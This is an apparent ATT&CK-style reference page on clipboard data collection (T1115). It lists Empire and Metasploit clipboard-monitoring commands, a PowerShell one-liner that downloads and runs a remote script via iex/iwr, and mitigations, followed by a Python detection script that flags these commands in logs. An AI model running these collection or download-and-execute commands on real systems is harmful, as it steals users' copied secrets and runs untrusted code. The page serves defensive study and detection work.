Clipboard Data
https://attack.mitre.org/techniques/T1115/
ATT&CK ID: T1115
Permissions Required: User
Description
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
In Windows, applications can access clipboard data by using the Windows API.
Techniques
Empire
This module monitors the clipboard on a specified interval for changes to copied text.
usemodule powershell/collection/clipboard_monitor

Get-ClipboardContents
Get-ClipboardContents monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the script's execution time.
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

Metasploit
This Metasploit module can be loaded from the meterpreter shell.
load extapi
# Read the target's current clipboard (text, files, images)
clipboard_get_data
# Dump all captured clipboard content
clipboard_monitor_dump
# Pause the active clipboard monitor
clipboard_monitor_pause
# Delete all captured clipboard content without dumping it
clipboard_monitor_purge
# Resume the paused clipboard monitor
clipboard_monitor_resume
# Start the clipboard monitor
clipboard_monitor_start
# Stop the clipboard monitor
clipboard_monitor_stop
# Write text to the target's clipboard
clipboard_set_text
PowerShell
The native PowerShell command Get-Clipboard retrieves information that is currently stored in the clipboard.
Get-Clipboard

Mitigations
Monitor executed commands and arguments that may collect data stored in the clipboard from users copying information within or between applications.
Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.
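One way to apply the two monitoring points above to PowerShell script block (event 4104) and process creation (event 4688) records, as an added example that is not part of the original page. The simplified record layout, the sample lines and the API patterns are assumptions; the command names are the ones shown on this page.

```python
import json
import re

# Command indicators come from this page; the API patterns are assumptions
# added to illustrate the "monitor API calls" guidance.
RULES = {
    "Get-Clipboard cmdlet": re.compile(r"\bGet-Clipboard\b", re.I),
    "Get-ClipboardContents script": re.compile(r"\bGet-ClipboardContents\b", re.I),
    "Win32 clipboard API": re.compile(r"\b(OpenClipboard|GetClipboardData)\b", re.I),
    ".NET Clipboard class": re.compile(r"Clipboard\]::Get\w+", re.I),
}
# Remote fetch piped into execution, as in the one-liner shown on this page.
CRADLE = re.compile(r"\b(iex|Invoke-Expression)\b.*\b(iwr|Invoke-WebRequest)\b", re.I | re.S)

# Constructed sample records (simplified fields, not real telemetry).
SAMPLE_LOG = """\
{"host": "WS01", "user": "alice", "event_id": 4104, "text": "Get-Clipboard | Out-File notes.txt"}
{"host": "WS02", "user": "bob", "event_id": 4104, "text": "iex (iwr -usebasicparsing https://example.invalid/Get-ClipboardContents.ps1);Get-ClipboardContents"}
{"host": "WS03", "user": "carol", "event_id": 4688, "text": "powershell.exe -c Set-Clipboard -Value done"}
{"host": "WS04", "user": "dave", "event_id": 4104, "text": "[System.Windows.Forms.Clipboard]::GetText()"}
not-json line from a truncated export
"""

def scan(log_text):
    """Return one alert dict per record whose text matches a clipboard rule."""
    alerts = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        try:
            rec = json.loads(line)
            text = rec["text"]
        except (ValueError, KeyError, TypeError):
            continue  # skip malformed or incomplete records
        hits = [name for name, rx in RULES.items() if rx.search(text)]
        if hits:
            alerts.append({
                "line": line_no,
                "host": rec.get("host"),
                "user": rec.get("user"),
                "rules": hits,
                "severity": "high" if CRADLE.search(text) else "medium",
            })
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Clipboard reads are common in legitimate scripts, so a bare Get-Clipboard match is rated medium here and is best triaged against the parent process and user context.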